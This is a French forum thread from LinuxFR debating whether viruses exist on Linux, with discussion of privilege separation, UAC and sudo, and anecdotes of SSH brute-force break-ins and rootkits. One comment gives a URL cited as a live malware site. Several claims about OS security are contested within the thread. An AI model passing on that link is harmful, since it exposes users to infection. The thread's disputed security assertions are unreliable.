              Bon faut pas non plus être médisant, c'est un énorme progrès par rapport aux applis DOS qu'on a réussi a éradiquer il y a quelques années. Maintenant on a des applis à la Win 95/98. Elle est pas belle la vie ?

  • # La dernière fois que j'ai vu un virus...

    Posté par . Évalué à  10 .

    La dernière fois que j'ai vu un virus, c'était Henri qui l'avait collé d'internet. Et ça imprimait pas !

  • # Comment savoir ?

    Posté par (page perso) . Évalué à  6 .

    C'est délicat comme question car en théorie seul un anti-virus permet de détecter leur présence de manière certaine.
    Comme je ne connais personne, dont moi, qui ont un GNU/Linux avec un anti-virus adapté, je vois mal comment nous pourrions être certain qu'il n'y en a pas.

    Car si certains virus sont par leur action visibles, d'autres sont plus vicieux et se cachent très bien dans les bas-fonds du système.

    Je pense qu'il n'y en a pas sur la plupart des machines sous GNU/Linux grâce à la bonne séparation des droits et un usage de l'ordinateur qui est plus propre en moyenne par ses utilisateurs que ceux de Windows. Mais nous ne sommes pas à l'abri pour autant.

    • [^] # Re: Comment savoir ?

      Posté par . Évalué à  5 .

      "La bonne séparation des droits"

      Je ne comprends pas comment cette légende urbaine prospère encore de nos jours.. Ca date de win98, qui avait FAT32 comme filesystem. Ce filesystem ne gère pas les droits, et un virus pouvait donc taper dans le système. A l'époque, avec linux, on avait ext2, et un hypothétique virus avec des droits user n'aurait pas pu modifier le système.
      Aujourd'hui, NTFS existe d'une part, et la plupart des distros linux balancent un sudo préconfiguré sans mot de passe, ce qui revient grosso modo au même point.
      En puis un virus ne va pas forcément essayer de gagner des droits root, des droits users sont généralement suffisant pour te voler les login/pass de ta banque ou transformer ta machine en relais de SPAM.

      Et l'histoire de l'usage propre, faut arrêter. Facebook s'est fait pigner son réseau en surfant sur un site de developpeur IOS légitime, NBC s'est fait pirater et s'est transformé en distributeur de vérole, et des agences de pub se font aussi pirater pour ajouter du code offensif sur n'importe quel site affichant ses pubs. Donc bon, si aller lire un site web de développeur ou lire des news n'est pas un usage "propre" alors je ne sais pas trop quoi conseiller.

      • [^] # Re: Comment savoir ?

        Posté par . Évalué à  3 .

        L'usage propre, c'est de commencer par éviter de cliquer sur le moindre lien, chose que les utilisateurs font. Tu sais, genre le pop-up "Vous avez été infectés par xxxx malwares, cliquez ici pour nettoyer votre ordinateur en urgence!" avec le xxxx qui défile vers des chiffres ahurissants, et le popup qui clignote comme un arbre de noël…
        Si ce genre de merdes existe, c'est parce que ça marche, hein, faut pas se voiler la face.
        Et sans même parler des mails…

        Autre comportement à risque, l'usage de cracks de logiciels. Tous ne sont pas vérolés (comme beaucoup ici - du moins, je suppose - j'en ai utilisé ma dose) mais c'est un vecteur important.

        Alors, oui, certains sites sérieux se font pirater. On y peut rien, et dans ces cas la, on l'a dans le… mais il faut en fait considérer ce qu'on pourrait appeler le niveau de risque: un site pr0n gratuit aura un plus haut niveau de risque que linuxfr ou developpez.com, par exemple.

        • [^] # Re: Comment savoir ?

          Posté par (page perso) . Évalué à  3 .

          un site pr0n gratuit aura un plus haut niveau de risque que linuxfr ou developpez.com, par exemple.

          C'est sûr qu'après une dure journée de code/veille/glandouillage on est moins attentif !
          -->[]

      • [^] # Re: Comment savoir ?

        Posté par (page perso) . Évalué à  7 .

        Je ne comprends pas comment cette légende urbaine prospère encore de nos jours.. Ca date de win98, qui avait FAT32 comme filesystem. Ce filesystem ne gère pas les droits, et un virus pouvait donc taper dans le système. A l'époque, avec linux, on avait ext2, et un hypothétique virus avec des droits user n'aurait pas pu modifier le système.

        La bonne séparation des droits c'est aussi avoir un compte d'utilisation distinct du compte administrateur. Par défaut Windows a longtemps pêché dessus au moins jusqu'à XP, je ne saurais dire après.

        Aujourd'hui, NTFS existe d'une part, et la plupart des distros linux balancent un sudo préconfiguré sans mot de passe, ce qui revient grosso modo au même point.

        Ah bon, quelles distributions ? Les distributions les plus connues ont un mot de passe quand sudo est activé par défaut même si c'est identique à celui de l'utilisateur.

        Et l'histoire de l'usage propre, faut arrêter. Facebook s'est fait pigner son réseau en surfant sur un site de developpeur IOS légitime, NBC s'est fait pirater et s'est transformé en distributeur de vérole, et des agences de pub se font aussi pirater pour ajouter du code offensif sur n'importe quel site affichant ses pubs. Donc bon, si aller lire un site web de développeur ou lire des news n'est pas un usage "propre" alors je ne sais pas trop quoi conseiller.

        Ça ne signifie pas que ce sont des virus qui ont permis l'attaque, je pense qu'il est bon de comprendre qu'une attaque informatique n'est pas uniquement due à un virus.
        De plus, en général, ce sont sur des sites douteux que la plupart des infections se produisent. Il peut y avoir des exceptions mais globalement en évitant les sites tordus tu évites la plupart des virus qui peuvent t'arriver dessus sans prévenir.

        • [^] # Re: Comment savoir ?

          Posté par . Évalué à  5 .

          Par défaut Windows a longtemps pêché dessus au moins jusqu'à XP, je ne saurais dire après.

          Vista a introduit l'UAC (~= gksu), un compte limité par défaut, et une séparation des droits plus complexe.

          "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

        • [^] # Re: Comment savoir ?

          Posté par . Évalué à  2 .

          La bonne séparation des droits c'est aussi avoir un compte d'utilisation distinct du compte administrateur.

          Ce qui est parfaitement inutile puisqu'il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM. Le lien que j'ai donné plus haut: http://picasa.com.playteck.net/indeks.php est un bon exemple de virus. Généralement le pirate n'est pas admin. Tu sais quoi, il ne cherche même pas à être admin, il s'en fout, il n'en a pas besoin.

          Ça ne signifie pas que ce sont des virus qui ont permis l'attaque, je pense qu'il est bon de comprendre qu'une attaque informatique n'est pas uniquement due à un virus.

          Ah, oui, j'oubliais. Comme on ne va pas appeler ça 'virus', on peut aller descendre dans la rue clamer haut et fort qu'il n'y a pas de 'virus' sous linux et que linux est fiable et sur ma bonne dame puisqu'il n'y a pas de 'virus'. Des machines linux sont remplies de code malveillants, les grandes boites se font percer, kernel.org a été percé, sourceforge, etc.. mais on continue de dire qu'il n'y a pas de 'virus' sous linux; la belle affaire.

          • [^] # Re: Comment savoir ?

            Posté par (page perso) . Évalué à  8 .

            Ce qui est parfaitement inutile puisqu'il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM. Le lien que j'ai donné plus haut: http://picasa.com.playteck.net/indeks.php est un bon exemple de virus. Généralement le pirate n'est pas admin. Tu sais quoi, il ne cherche même pas à être admin, il s'en fout, il n'en a pas besoin.

            Le fait de ne pas être admin limites certaines possibilités bien dangereuses.
            C'est toujours mieux de limiter certains risques que d'être open bar car « on s'en fou, personne ne veut être admin ». Je me souviens du virus dans le passés qui pouvaient faire des dégâts très importants ce qui n'était que par le manque de protection matérielle et logicielle.

            Ah, oui, j'oubliais. Comme on ne va pas appeler ça 'virus', on peut aller descendre dans la rue clamer haut et fort qu'il n'y a pas de 'virus' sous linux et que linux est fiable et sur ma bonne dame puisqu'il n'y a pas de 'virus'. Des machines linux sont remplies de code malveillants, les grandes boites se font percer, kernel.org a été percé, sourceforge, etc.. mais on continue de dire qu'il n'y a pas de 'virus' sous linux; la belle affaire.

            Le vocabulaire a en sens, son but est de définir proprement les choses pour avoir des discussions ayant un sens. Assimiler virus avec d'autres types de menaces peut être du non-sens d'autant qu'ici la question est explicite.
            Je ne dis pas que l'absence de virus sur une plateforme signifie qu'elle est saine, il y a forcément des failles et des moyens de les exploiter mais ce ne sont pas pour autant des virus.
            Le virus par son aspect autonome et auto-répliquant peut se répandre bien plus vite que toute autre menace, éviter leur usage est déjà une bonne chose même si cela ne garantie pas un système parfaitement fiable.

            • [^] # Re: Comment savoir ?

              Posté par (page perso) . Évalué à  5 .

              Le fait de ne pas être admin limites certaines possibilités bien dangereuses.

              Quoi donc ?

              Par rapport aux virus d'antan, on a perdu le risque de se faire griller son écran, mais on a gagné le risque de se faire vider son compte en banque, d'envoyer des images de zoophilie pédosexuelle à tout son carnet d'adresses, de spammer la terre entière ou de servir de relais à warez et d'avoir l'HADOPI qui descend en rappel la façade de l'immeuble…

              Je me demande si je préfèrais pas les virus admin qui grillent l'écran…

              • [^] # Re: Comment savoir ?

                Posté par . Évalué à  1 .

                Bah, les utilisateurs ne sont pas tous des adolescents boutonneux.

                Par exemple, sur un ordinateur de bureau partagé par une famille, avoir des utilisateurs séparés permet d’éviter que le petit dernier qui vient juste d’avoir le droit de s’en servir installe n’importe quoi (y compris des virus), qui pourraient justement vider les comptes. De même, une séparation entre adultes permet de n’avoir qu’un seul compte vidé par exemple.

                • [^] # Re: Comment savoir ?

                  Posté par (page perso) . Évalué à  2 .

                  Tout à fait, et tous les OS grands publics proposent des utilisateurs séparés non-admin depuis bientôt 10 ans.

          • [^] # Re: Comment savoir ?

            Posté par (page perso) . Évalué à  10 .

            Ce qui est parfaitement inutile puisqu'il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM.

            Pourquoi ne pas utiliser un compte user classique séparé du compte user "sensible" qui ne sert qu'à faire tes opérations bancaires ? Moi je fais ça et ça se configure en 30 secondes chrono.

            • [^] # Re: Comment savoir ?

              Posté par . Évalué à  3 .

              Oui.. mais c'est chiant de s'y connecter à chaque fois, donc je le fais depuis ma session.

              M. Michu.

              • [^] # Re: Comment savoir ?

                Posté par (page perso) . Évalué à  -4 .

                Je rappelle que sous Linux on peu avoir plusieurs sessions graphiques en même temps, depuis le début.

                Je me rappelle que même sous XP, il fallait se déconnecter pour ouvrir une autre session… très chiant, et ça explique en partie pourquoi les gens sont admin et user sur leur compte, et donc comment une cochonnerie ira foutre le boxon dans tous les comptes de la famille.

                Linux : sécurité, fiabilité, sérénité.

                • [^] # Re: Comment savoir ?

                  Posté par . Évalué à  4 .

                  Je me rappelle que même sous XP, il fallait se déconnecter pour ouvrir une autre session…

                  Tu te rappelles mal, c'est justement une des fonctionnalités mises en avant lors que tu installes un XP : Description de la fonction Changement rapide d'utilisateur
                  Ça se configure dans le panneau de conf' -> comptes utilisateurs

                  "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

                • [^] # Re: Comment savoir ?

                  Posté par . Évalué à  2 .

                  Je ne me souviens pas avoir parlé de déconnexion …

          • [^] # Re: Comment savoir ?

            Posté par . Évalué à  3 .

            il est inutile d'être admin pour te voler les logins de ta banque ou de distribuer du SPAM.

            Peut-être, mais il est très utile d'être admin pour se répliquer et se propager.

            Les virus se propagent, c'est même à ça qu'on les reconnaît.

            • [^] # Re: Comment savoir ?

              Posté par . Évalué à  2 .

              Les virus se propagent, c'est même à ça qu'on les reconnaît.

              Ca se fait très bien en mode utilisateur : messagerie, client IM, etc.

  • # Paranoïaque vs confiance

    Posté par (page perso) . Évalué à  5 .

    Combien, parmi les gens qui ont voté sur ce sondage, sont sûrs qu'il n'y a pas une routine cachée dans le noyau (aussi libre soit-il) de leur OS ou encore dans les pilotes de leur GPU?

    En fait pour être sûr de ne pas avoir de virus, il faudrait avoir lu et compris l'ensemble des sources utilisées pour produire nos OS et environnements logiciels. Autant dire que ce n'est pas humainement faisable.

    Tout ça pour dire que la question se pose mieux en terme de confiance pour moi. A-t-on davantage confiance dans une communauté de logiciel libre ou dans une société experte en sécurité informatique qui base son activité, sa pérennité et son devenir sur les virus potentiels qui vont vous infecter?

    • [^] # Re: Paranoïaque vs confiance

      Posté par . Évalué à  3 .

      Les réponses sont dans tes questions.

      1) Personne n'est à 100% sûr de quoi que ce soit sur cette terre ni ailleurs. Même pas que 1+1 == 2 (ou 10 si tu préfères) vu les effets improbables mais bien réels de la nature quantique de tout ce qui est.

      2) En quoi as-tu le plus confiance: 500 personnes "clés" appartenant et travaillant pour une ou une poignée de sociétés ou 10000 personnes travaillant pour une myriade/panoplie de sociétés ou pour leur propre compte ?

      Donc en effet la confiance est ce qui importe très clairement le plus et baser celle-ci sur un maximum de personnes/d'horizons différents est donc ce qu'il y a de mieux. Une (ou même quelques) société(s) aussi experte(s) soi(en)t-elle(s) ne sera(ont) jamais un gage de sécurité: il ne faut jamais penser que quelques entités que ce soient dont dépendent leur revenu te diront du mal de leur compétence, que ce soit à priori ou à posteriori…

  • # Ce genre de sondage est stupide

    Posté par . Évalué à  5 .

    D'ailleurs un exploit local exploité a été découvert très récemment:
    http://lwn.net/Articles/539885/

  • # Rootkit dans GCC

    Posté par . Évalué à  3 .

    Le dernier virus croisé était un rootkit dans gcc qui patchait à la compilation le code pour y inscrire backdoor, rootkit j'en passe et des meilleurs.
    C'était suite à l'intrusion de plusieurs serveur Debian.
    me rappelle plus le détails.

    On peut lire le manuel de référence debian à ce sujet :
    securing debian-howto

    ma contrib ->[]

  • # Un ver, des vers

    Posté par (page perso) . Évalué à  3 .

    […] dernière fois que j'ai vu un virus / vers concernant Linux

    À corriger dans le titre et dans le corps du sondage, si un modérateur bienveillant passe par là. Si on pouvait en prime mettre un accent sur le À majuscule et des espaces avant les points d'interrogation, on ferait des pinailleurs heureux.

    Naha, pinailleur malheureux

  • # ça arrive !

    Posté par . Évalué à  5 .

    Il y a un quelques temps, mon serveur est tombé en panne de carte mère.
    Et le temps que j'en reçoive une autre, je me suis permis de me mettre sur le wifi de ma box avec mon portable, le tout directement connecté au net (ip publique, toussa)

    10 minutes plus tard, voyant une activité suspecte de mon processeur (j'ai toujours un petit moniteur dans ma barre des taches), je lance un top pour voir, et je me rends compte qu'un script kiddies à la con est entré sur ma machine par le fabuleux compte de test que je m'étais fait : test/test, bien évidemment, avec un catalogue d'une cinquantaine de mots de passes par ssh.
    Et là, il a téléchargé et compilé un petit executable qui essayait de craquer les autres comptes de la machine…

    Bon ok, c'est de ma faute, mais j'ai tout de même été très surpris, 10 minutes quoi !

    • [^] # Re: ça arrive !

      Posté par (page perso) . Évalué à  4 .

      Lorsqu'on demande à iptables de loguer les appels, on s'aperçoit que l'on est en permanence attaqué par des robots.
      Certes,il y a des moments de répit, mais ils sont courts, rarement plus d'une heure.
      Se protéger avec des mots de passe complexes est une vraie nécessité.

      J'ai eu un rootkit "pcb" il y a quelques années qui s'était installé sur une distribution fraichement installée. C'est le seul cas en 18 ans d'utilisation intensive de Linux.

      J'avais fait il y a longtemps ce petit article : http://pjarillon.free.fr/redac/virus.html est il toujours d'actualité ?

      • [^] # Re: ça arrive !

        Posté par . Évalué à  2 .

        Je suis tout à fait d'accord pour le mot de passe fort, et je n'ai pas d'excuses là dessus.
        Mais ce portable ne devait jamais, à priori, se retrouvé directement connecté à l'internet. Donc je ne me méfiait pas vraiment pour le coup de ce genre d'attaque.

        Et our le coup de l'attaque permanente, j'ai déjà fait le test avec tcpdump, les ports de la machine sont scannés en permanence, c'est affolant !

        • [^] # Re: ça arrive !

          Posté par . Évalué à  3 .

          Pour ma part, j'en ai eu marre de voir des tentatives de connexion ssh root pourrir les logs de mon serveur dédié. J'ai pris les plages d'adresses IP mappées sur la chine et fait un iptables -j DROP pour bannir ce magnifique pays… Depuis mes logs sont propres…
          Sinon, je me souviens en 2005, d'avoir installé WinXP (j'étais pas encore full linux a l'époque) en laissant ma connexion Freebox 'bridge' branché… Le PC était piraté avant la fin de l'install. Au moins je n'ai pas perdu de données :-P

          • [^] # Re: ça arrive !

            Posté par . Évalué à  2 .

            J'ai pris les plages d'adresses IP mappées sur la chine et fait un iptables -j DROP pour bannir ce magnifique pays…

            Sinon, en moins bourrin, il y a fail2ban.

      • [^] # Re: ça arrive !

        Posté par . Évalué à  2 .

        Le contenu de ton lien etait deja faux il y a longtemps, il est toujours aussi faux.

        • [^] # Re: ça arrive !

          Posté par (page perso) . Évalué à  2 .

          t'as pas un peu plus d'arguments pour étayer tes propos?

          • [^] # Re: ça arrive !

            Posté par . Évalué à  6 .

            Oh je sais pas, prends une des 1ere phrases genre :

            Il n'y a pas de virus avec Linux ainsi que sur Mac OS/X car l'architecture de leurs logiciels est conçue pour ne leur permettre ni de pénétrer, ni de se répliquer, ni de se propager.

            Tout est faux la-dedans : Oui il y a des virus sous Unix, non l'architecture n'empeche pas les virus plus qu'ailleurs.

            Cependant, comme la perfection n'existe pas, il arrive qu'en lisant et relisant le code source, des informaticiens trouvent parfois des failles potentielles de sécurité. Les corrections sont aussitôt réalisées et les mises à jour de sécurité livrées aux utilisateurs dans les heures qui suivent. La déontologie veut que l'on publie le correctif avant de signaler la faiblesse. Ainsi les correctifs arrivent avant que les failles de sécurité puissent être exploitées.

            La aussi c'est faux. Les failles sont tres rarement trouvees par revue de code, pour l'enorme majorite des utilisateurs ells n'arrivent pas en 'quelque heures', et ells ne sont pas forcement corrigees avant d'etre exploitees.

            Et il y a des memes des conneries qu'un enfant de 5 ans ne ferait pas genre :

            Les processeurs actuels effectuent en permanence la vérification de l'autorisation d'accéder aux adresses en mémoire. Tous les Unix utilisent depuis toujours ce mode d'adressage et les protections décrites ci-dessus sont toujours actives. Les Windows de tout poil ont la mauvaise idée de désactiver ce mode.

            Non vraiment, c'est un tissu d'aneries de la premiere a la derniere phrase.

            • [^] # Re: ça arrive !

              Posté par . Évalué à  2 .

              [Mode ironie de mauvaise foi ON]

              Et il y a des memes des conneries qu'un enfant de 5 ans ne ferait pas genre :

              Les processeurs actuels effectuent en permanence la vérification de l'autorisation d'accéder aux adresses en mémoire. Tous les Unix utilisent depuis toujours ce mode d'adressage et les protections décrites ci-dessus sont toujours actives. Les Windows de tout poil ont la mauvaise idée de désactiver ce mode.

              A 5 ans tu connaissais le comportement des processeurs sur les architectures Windows et Unix ??? O_o
              Comme dirais un certain Darth :"Impressive !"

              [Mode ironie de mauvaise foi OFF]

              +1 pour le reste

  • # Wormux

    Posté par . Évalué à  10 .

    A quand remonte la dernière fois que vous avez vu un virus/vers concernant Linux?

    C'était ça, je crois bien :-)

    Wormux

    • [^] # Re: Wormux

      Posté par (page perso) . Évalué à  1 .

      Pinailleur du matin, je sais , mais il n'y a pas de vers sur la nimage. D'ailleurs je me demande si il y a des vers dans Wormux?
      Je me rappelle avoir joué le rôle du mouton qui prend cher, mais je ne me rappelle pas avoir vu des vers.

      • [^] # Re: Wormux

        Posté par . Évalué à  3 .

        C'était mieux à vent :

        A vent

  • # Plus d’un an

    Posté par . Évalué à  1 .

    Vers 2002, nous avions un serveur d’asso sur internet. Un jour, on a découvert un processus louche dont l’exécutable était dans /tmp… On l’a tué. Dans l’instant qui a suivi, nous avons perdu l’accès à la machine. Nous avons dû attendre le lundi matin pour demander qu’elle soit redémarrée. Elle avait tenue presque 24h avant de crashé sous le DOS.
    Sinon, ce n’est pas impossible d’avoir un virus sous GNU/Linux effectivement, avec la séparation des privilèges, le virus à plus de mal à se propager que sur un Windows < 2000. Mais aujourd’hui avec les fainéants des mots de passe, il est facile de devenir root si on est sur le compte d’un admin. S’il y en a peu, c’est parce que pour l’instant, nous étions une niche de gens informé des risques, que se passera-t-il lorsque nous aurons 40% du marché ?

    • [^] # Re: Plus d’un an

      Posté par (page perso) . Évalué à  10 .

      que se passera-t-il lorsque nous aurons 40% du marché ?

      Bof on s'en fout, on sera pas là pour le voir.

    • [^] # Re: Plus d’un an

      Posté par . Évalué à  1 .

      le virus à plus de mal à se propager que sur un Windows < 2000

      En fait, sur la famille de windows qui nous viens de MSDOS. La famille NT, conçue pour les entreprise, intègre une gestion des comptes réelle depuis plus longtemps, si je ne m'abuse.

      • [^] # Re: Plus d’un an

        Posté par . Évalué à  3 .

        Oui, je parlais pour le grand public. Mais le problème restera l’interface chaise-clavier. Va expliquer à un utilisateur qu’il doit changer de compte pour installer son logiciel…

        • [^] # Re: Plus d’un an

          Posté par . Évalué à  1 .

          Je n'ose même pas ne serait-ce qu'imaginer essayer :D

        • [^] # Re: Plus d’un an

          Posté par . Évalué à  7 . Dernière modification : le 27/02/13 à 14:06

          Pour le grand public, Windows 2000 (NT5) est sorti en… 2000. La commande runas est arrivée avec Windows 2000 wikipédia dixit. Les bonnes pratiques à la Linux existent depuis un petit bout de temps sur les NT. NTFS disponible sur Windows 2000 intègre des ACLs (complexe à mon goût) qui permettent une gestion fine des droits.

          La partie technique était présente chez Microsoft, néanmoins la question intéressante serait de savoir ou et pourquoi ça a foiré ?

          Bien évidement, On peut envisager que l'utilisateur Windows est un trisomique, dépressif en contexte d'inadaptation et que sa mère a forniqué avec des chèvres, tandis que l'utilisateur Linux est le fils naturel d'Einstein et d'Apollon et qu'il possède de manière innée l'intelligence et la clairvoyance d'un demi-dieu. Par contre, je crains que cette théorie ne soit un soupçon réductrice.

          • [^] # Re: Plus d’un an

            Posté par . Évalué à  2 .

            Pour le grand public, Windows 2000 (NT5) est sorti en… 2000

            Windows 2000 est sorti en 2000 pour les professionnels (donc on le retrouvait parfois en OEM), les PME, et en versions Serveur.
            Le pendant grand public sorti simultanément fut Windows ME.

            C'est XP qui était proposé aux deux en 2001.

            "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

            • [^] # Re: Plus d’un an

              Posté par . Évalué à  1 .

              Autant pour moi. Bon, bien qu'arrivé un peu plus tard, Windows XP était très proche de Windows 2000 (NT5.0 versus NT5.1), tout du moins avant les divers service packs qui ont apporté leur lots de fonctionnalités supplémentaires.

          • [^] # Re: Plus d’un an

            Posté par . Évalué à  -4 .

            Bien évidement, On peut envisager que l'utilisateur Windows est un trisomique, dépressif en contexte d'inadaptation et que sa mère a forniqué avec des chèvres, tandis que l'utilisateur Linux est le fils naturel d'Einstein et d'Apollon et qu'il possède de manière innée l'intelligence et la clairvoyance d'un demi-dieu. Par contre, je crains que cette théorie ne soit un soupçon réductrice.

            Ben t'es pas loin de la verite. T'as remarque les parts de marche de Linux ? T'as remarque que quasiment tous les utilisateurs de Linux savent ce qu'est un filesystem a peu pres, et meme ce qu'est une partition ?

            Voila 2 choses qu'enormement de gens sous Windows ne connaissent pas. T'as remarque que Linux en est a 1% de parts de marche ? Tu crois que les les gens qui ne connaissent ce qu'est une partition ils sont dans les 1% ou dans les 99% de la population ?

      • [^] # Re: Plus d’un an

        Posté par . Évalué à  1 .

        La famille MS-DOS des Windows est morte avec Windows ME en 2000, qui a été remplacé par XP (NT 5.1) en 2001.

        "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

        • [^] # Re: Plus d’un an

          Posté par . Évalué à  1 .

          Je le sais (et je ne la regrette pas, d'ailleurs).
          C'était simplement pour rappeler le fait que la gestion des comptes utilisateurs ne date pas de 2000 chez microsoft, chose que l'on a souvent tendance à oublier.

          Le grand souci, c'est plutôt le fait que, par défaut, l'utilisateur principal soit admin… (au moins avec XP. Ensuite, avec l'UAC de vista, je ne suis pas sûr que l'on puisse considérer que le compte admin est réellement séparé, mais il doit y avoir au moins un peu de protection, quand les gens ne le désactivent pas…)

          • [^] # Re: Plus d’un an

            Posté par . Évalué à  2 . Dernière modification : le 27/02/13 à 13:44

            Depuis Vista, l'utilisateur a par défaut un compte limité. Avec l'UAC, il peut exécuter un programme avec des droits administrateur, mais en restant sur son compte (c'est différent d'avant où devenir admin signifiait utiliser le compte "Administrateur" avec les droits et les fichiers et les paramètres qui vont avec)

            Pour avoir ça sous XP, il existe SuRun.

            Hélas, oui, pléthore de kikoolols désactivent l'UAC…

            "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

            • [^] # Re: Plus d’un an

              Posté par . Évalué à  3 .

              Hélas, oui, pléthore de kikoolols désactivent l'UAC…

              Marrant, j'aurai parlé d'utilisateurs normaux, moi. En même temps, comment faire comprendre l'intérêt de protéger ses données à des gens qui, par exemple, ne mettront pas leurs équipements de sécurité (ou ne respectent pas les pratiques de sécurité, peu importe… genre sur la route, au travail… partout en fait, et ça m'inclue) au quotidien?
              Ensuite, il y a ceux qui laissent l'UAC, mais répondent systématiquement "ok" ou "faire confiance" (je connais pas le texte), je me trompe?
              Au final, je me demande si ça diminue vraiment le risque… même si c'est mieux que rien.

              Je sais que ça n'a pas grand chose à voir à première vue, mais quand faire comprendre un danger évident est si complexe, quelque chose d'aussi irréel (du moins, qui le semble) que l'informatique, ça tiens du fantasme…

        • [^] # Re: Plus d’un an

          Posté par (page perso) . Évalué à  2 .

          Sur XP, il y a toujours du MS-DOS.

          M$ a même retiré des outils au fur et à mesure, genre la commande whois… dont je me souvient de son existence sur un Win Me.

          Du coups, les gens sous M$ sont oblgés d'installer de tas de trucs, et vont les chercher sur le web n'importe comment, et se chopent des cochonneries.

          Sous Linux, l'installation de logiciels est plus pratique, plus propre, ce qui prouve que ce modèle est le bon, et évite l'éventuelle propagation de virus vers à grande échelle.

          • [^] # Re: Plus d’un an

            Posté par . Évalué à  -2 .

            Sur XP, il y a toujours du MS-DOS.

            Non mais quelles conneries on peut pas lire ici quand meme…

            Il n'y a pas de MS-DOS dans XP, il y a une machine virtuelle DOS qui tourne au dessus du noyau NT. Lance 2 fenetres DOS differentes, lance un programme resident dans l'un, il n'apparait pas dans l'autre…

            M$ a même retiré des outils au fur et à mesure, genre la commande whois… dont je me souvient de son existence sur un Win Me.

            Ouh lala, c'est vrai que ta grand mere et ton fils ont surement besoin de cet outil en ligne de commande plutot qu'aller sur le site web d'un registrar…

            Du coups, les gens sous M$ sont oblgés d'installer de tas de trucs, et vont les chercher sur le web n'importe comment, et se chopent des cochonneries.

            Les gens ils vont sur le web oui, et ils choppent des tas de trucs effectivement. Cela fait un bon moment maintenant que le browser leur dit si ce qu'ils ont downloade est un truc reconnu comme sur ou pas par contre, si ils passent outré c'est un peu leur faute aussi. Faudrait penser a te mettre au gout du jour plutot que rester sur ton experience d'un OS d'il y a 12 ans.

            Sous Linux, l'installation de logiciels est plus pratique, plus propre, ce qui prouve que ce modèle est le bon, et évite l'éventuelle propagation de virus vers à grande échelle.

            Moi j'aimerais bien savoir comment installer le dernier Firefox sur ma Redhat d'il y a 12 ans. Parce que bon, j'y arrive sur mon XP qui a 12 ans, mais je le trouve pas dans mon depot…

          • [^] # Re: Plus d’un an

            Posté par . Évalué à  1 .

            Sur XP, il y a toujours du MS-DOS.

            Il n'a jamais été présent sur la série des Windows NT. Ce que tu vois à travers l'invite de commandes disponible sous XP, c'est la "bonne vieille" NT Virtual DOS Machine.

            Ça veut tout dire.

            "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

            • [^] # Re: Plus d’un an

              Posté par (page perso) . Évalué à  2 .

              Et il n'y a plus de fichiers autoexec.bat sous XP?

              Je me plante probablement, il faudrait définir ce qu'est le MS-DOS peut être, mais j'en ai rien à battre :)

              Content de savoir que Machin à laisser la "bonne vieille" NT Virtual DOS Machine parce que ça reste pratique pour relancer la config réseau.

              Dommage que l'utilitaire whois ai été viré parce qu'il prenait trop de place sur le disque, c'était pratique, ça évitait de devoir chercher sur le web, rentrer éventuellement un captcha etc…

              • [^] # Re: Plus d’un an

                Posté par . Évalué à  3 . Dernière modification : le 28/02/13 à 11:50

                Et il n'y a plus de fichiers autoexec.bat sous XP?

                Bah non. Et ça ne date pas de XP, mais du tout premier Windows NT (1992). S'il y en a un, il fait 0 octet ou alors il s'appelle C:\WINDOWS\SYSTEM32\AUTOEXEC.NT, et sert uniquement à des fins de rétrocompatibilité (exemple : une application Win16 qui vérifie si elle est bien sous Windows 3.11 en testant si C:\AUTOEXEC.BAT existe), ou sert à l'émulation DOS de NTVDM.

                Cette émulation étant plus qu'imparfaite, on lui préfèrera DOSBox ou à la rigueur VDMSound, voire DOSEMU.

                Content de savoir que Machin à laisser la "bonne vieille" NT Virtual DOS Machine parce que ça reste pratique pour relancer la config réseau.

                On peut faire pareil avec la GUI services.msc

                "Quand certains râlent contre systemd, d'autres s'attaquent aux vrais problèmes." (merci Sinma !)

                • [^] # Re: Plus d’un an

                  Posté par (page perso) . Évalué à  2 .

                  On peut faire pareil avec la GUI services.msc

                  Il est où?

                  Dans la console command.com je lance:
                  ipconfg /renew

                  C'est pratique la ligne de commande.

                  • [^] # Re: Plus d’un an

                    Posté par . Évalué à  4 .

                    il est où?

                    Dans la console command.com je lance:
                    services.msc

                    C'est pratique la ligne de commande.

                    Désolé ;-)

  • # ben y'a 5 minutes

    Posté par (page perso) . Évalué à  10 .

    … je lisais la GPL :-)

    les pixels au peuple !

    • [^] # Re: ben y'a 5 minutes

      Posté par . Évalué à  1 .

      Effectivement elle est partout!

      cd netbsd/src ; find ./ -name "gpl*"
      
      ./external/gpl3
      ./external/gpl3/gcc/dist/libstdc++-v3/doc/xml/gnu/gpl-3.0.xml
      ./external/gpl3/gcc/dist/gcc/doc/gpl.7
      ./external/gpl3/gcc/dist/gcc/doc/include/gpl.texi
      ./external/gpl3/gcc/dist/gcc/doc/include/gpl_v3.texi
      ./external/gpl3/gdb/dist/gdb/doc/gpl.texi
      ./external/gpl2
      ./gnu/dist/gcc4/gcc/doc/include/gpl.texi
      
      
    • [^] # Re: ben y'a 5 minutes

      Posté par . Évalué à  3 .

      Tu confonds, le cancer, ce n'est pas un virus.

      Tous les nombres premiers sont impairs, sauf un. Tous les nombres premiers sont impairs, sauf deux.

  • # Pas sous linux, mais…

    Posté par (page perso) . Évalué à  4 .

    Récemment j'ai eu maille à partir avec deux machines sous windos. Pour l'une il fallait sauver les données d'un seven inopinément décédé puis reformater, et pour l'autre installer une ubuntu. À chaque fois, les différents outils (parted et fdisk) de partitionnements rapportaient des informations peu cohérentes. Il arrivait même que parted se plante. Comme sur mes disques durs ses outils ont toujours très bien fonctionné, je ne peux n’empêcher de m'interroger : n'y aurait-il pas des vers infectant widows et modifiant discrètement le partitionnement afin de disposer de larges secteurs pour positionner leurs données à l'abri des regards de tout ce qui emploi les API mirosoft ? S'agit-il plus prosaïquement d'une nouvelle petite entorse aux standards introduite par les séides de Billou pour entraver la concurrence ?

    • [^] # Re: Pas sous linux, mais…

      Posté par . Évalué à  0 .

      C'est vrai qu'un troll Billou plutot que de simplement imaginer une corruption du a un secteur defectuex (un seven inopinement decede) fallait pas laisse passer l'occasion de partager sur Linuxfr.

